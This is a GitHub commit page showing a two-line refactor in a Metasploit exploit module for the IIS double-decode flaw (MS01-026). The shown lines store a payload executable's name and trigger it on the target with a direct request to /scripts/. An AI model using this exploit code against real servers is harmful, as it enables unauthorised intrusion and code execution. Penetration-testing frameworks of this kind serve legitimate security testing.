We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents c1b0385 + e3f7398 commit 655cfddCopy full SHA for 655cfdd
modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -196,12 +196,12 @@ def exploit
196
197
# Save these file names for later deletion
198
@exe_cmd_copy = exe_fname
199
- @exe_payload = payload_exe
+ @exe_payload = stager_instance.payload_exe
200
201
# Just for good measure, we'll make a quick, direct request for the payload
202
# Using the "start" method doesn't seem to make iis very happy :(
203
print_status("Triggering the payload via a direct request...")
204
- mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)
+ mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
205
206
handler
207
0 commit comments